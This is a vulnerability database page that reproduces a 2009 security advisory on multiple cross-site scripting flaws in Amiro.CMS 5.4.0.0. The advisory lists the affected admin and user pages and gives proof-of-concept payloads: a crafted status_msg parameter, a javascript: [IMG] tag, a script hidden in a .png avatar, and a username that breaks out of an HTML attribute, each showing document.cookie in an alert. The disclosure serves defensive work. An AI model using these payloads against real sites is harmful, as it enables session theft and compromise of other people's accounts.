Lucene search
K

Amiro.CMS 5.4.0.0 Cross Site Scripting

🗓️ 20 Oct 2009 00:00:00Reported by Vladimir VorontsovType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Amiro.CMS 5.4.0.0 Cross Site Scripting vulnerabilit

Code
`++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[ONSEC-09-004] Amiro.CMS Multiple XSS   
Objective: Amiro <= 5.4.0.0   
Type: Cross-site scripting   
Threat: Medium   
Date Discovered: 01.07.2009   
Date of notification Developer: 01.07.2009   
Released fixes: 06.10.2009   
Author: Vladimir Vorontsov   
OnSec Russian Security Group (onsec [dot] ru)   
Description: ================================================ ====   
The vulnerability exists due to defect in the function test special  
characters in the string parameter status_msg. Especially the query with  
the tag [ALERT] [/ ALERT] allows you to make any sacrifices in the browser  
JavaScript code. Parameter status_msg serves to notify the user and  
processed at:   
================================================== ==   
http://localhost:7777/news   
http://localhost:7777/comment   
http://localhost:7777/forum   
http://localhost:7777/blog   
http://localhost:7777/tags   
http://localhost:7777/_admin/forum.php   
http://localhost:7777/_admin/discussion.php   
http://localhost:7777/_admin/guestbook.php   
http://localhost:7777/_admin/blog.php   
http://localhost:7777/_admin/news.php   
http://localhost:7777/_admin/srv_updates.php   
http://localhost:7777/_admin/srv_backups.php   
http://localhost:7777/_admin/srv_twist_prevention.php   
http://localhost:7777/_admin/srv_tags.php   
http://localhost:7777/_admin/srv_tags_reindex.php   
http://localhost:7777/_admin/google_sitemap.php   
http://localhost:7777/_admin/sitemap_history.php   
http://localhost:7777/_admin/srv_options.php   
http://localhost:7777/_admin/locales.php   
http://localhost:7777/_admin/plugins_wizard.php   
  
Special types of string parameter is as follows (the submission  
URL-decoded):   
  
? status_msg = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a:  
2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert  
(document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}}   
  
Implementation:   
  
http://localhost:7777/news/?status_msg=a% 3A2% 3A% 7Bs% 3A3% 3A% 22sys% 22%  
3Ba% 3A0% 3A% 7B% 7Ds% 3A5% 3A% 22plain% 22% 3Ba% 3A1 % 3A% 7Bi% 3A0% 3Ba%  
3A2% 3A% 7Bs% 3A3% 3A% 22msg% 22% 3Bs% 3A68% 3A% 22ONsec.ru% 20 -% 20XSS%  
20test% 5BALERT% 5D% 5C% 27% 29% 3Balert% 28document.cookie% 29% 2F%  
2Falert% 28% 5B% 2FALERT% 5D% 22% 3Bs% 3A4% 3A% 22type% 22% 3Bs% 3A4% 3A%  
22none% 22% 3B% 7D% 7D% 7D   
  
================================================== ====   
Vulnerability exists in the processing function values of the tag [IMG],  
which serves to place the pictures in the message body. By sending a  
special message on the forum, guestbook or leave a comment, an attacker can  
execute arbitrary JavaScript code on the victim's computer, which will see  
his message. The result of the example depends on the browser, checked on  
Opera 9.52 build 10108.   
================================================== ====   
Implementation:   
  
[IMG] javascript: alert (document.cookie +% 27 \ n \ nONsec.ru% 27) [/ IMG]  
  
  
================================================== ====   
The vulnerability exists due to the lack of checks on user avatars. An  
attacker could upload an avatar with JavaScript code inside the file with  
the extension. PNG,. JPG or other image. When you open a full reference to  
this picture browser Internet Explorer <= 7, on a computer to execute  
contained within JavaScript code.   
================================================== ====   
Implementation:   
  
Create a file with the following contents:   
  
<script> alert (document.cookie + "\ n \ nONsec.ru") </ script>   
  
save it as avatar.png, then upload as your avatar. Open the link to the  
downloaded file browser InternetExplorer <= 7.   
  
================================================== ====   
The vulnerability exists due to the lack of filtering of characters in the  
user name when logging into the administrative console. When sending a POST  
request to a page http://localhost:7777/pages.php similar content:   
================================================== ====   
username = "> <script> alert (document.cookie +" \ n \ nONsec.Ru ") </  
script>   
  
application returns the following response:   
  
<input class=field style="width:100px" type=text name="loginname" value="">  
<script> alert (document.cookie + "\ n \ nONsec.Ru") </ script> ">   
  
Implementation:   
  
In the administrative console login prompt, enter the user name:   
  
"> <script> alert (document.cookie +" \ n \ nONsec.Ru ") </ script>   
  
and will realize the login attempt  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2009 00:00Current
7.4High risk
Vulners AI Score7.4
19